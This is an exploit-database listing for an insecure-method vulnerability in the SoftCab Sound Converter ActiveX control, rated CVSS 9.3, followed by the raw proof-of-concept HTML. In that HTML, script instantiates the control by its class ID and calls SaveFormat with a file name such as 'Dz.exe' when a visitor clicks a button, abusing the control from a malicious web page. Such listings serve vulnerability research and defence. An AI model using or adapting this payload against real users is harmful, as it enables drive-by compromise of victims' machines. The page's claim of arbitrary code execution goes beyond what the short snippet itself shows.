header-logo
Suggest Exploit
vendor:
Sound Converter ActiveX
by:
ThE g0bL!N
9.3
CVSS
HIGH
Insecure Method Exploit
20
CWE
Product Name: Sound Converter ActiveX
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: Unknown
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP2
Unknown

SoftCab Sound Converter ActiveX (sndConverter.ocx) Insecure Method Exploit

A vulnerability in SoftCab Sound Converter ActiveX (sndConverter.ocx) allows an attacker to execute arbitrary code on the vulnerable system. The vulnerability exists due to an insecure method in the sndConverter.ocx ActiveX control, which can be exploited to execute arbitrary code by calling the SaveFormat() method with a specially crafted argument. This can be exploited to execute arbitrary code by tricking a user into visiting a malicious web page.

Mitigation:

No known mitigation is available.
Source

Exploit-DB raw data:

<!--
# Author: ThE g0bL!N
# Software Link: http://www.softcab.com/ftp/converter_activex.zip
# Version:
# Tested on: Xp sp2
-->
<title>Exploited By : ThE g0bL!N </title>
<BODY>
 <object id=dz classid="clsid:{66757BFC-DA0C-41E6-B3FE-B6D461223FF5}"></object>

<SCRIPT>

function Do_it()
 {
     File = "Dz.exe"
   dz.SaveFormat(File)
 }

</SCRIPT>
<h3>SoftCab Sound Converter ActiveX (sndConverter.ocx) Insecure Method Exploit </h3>
<input language=JavaScript onclick=Do_it() type=button value="Click here To Test"><br>
</body>
</HTML>

Navigation

Suggest Exploit

Services By CQR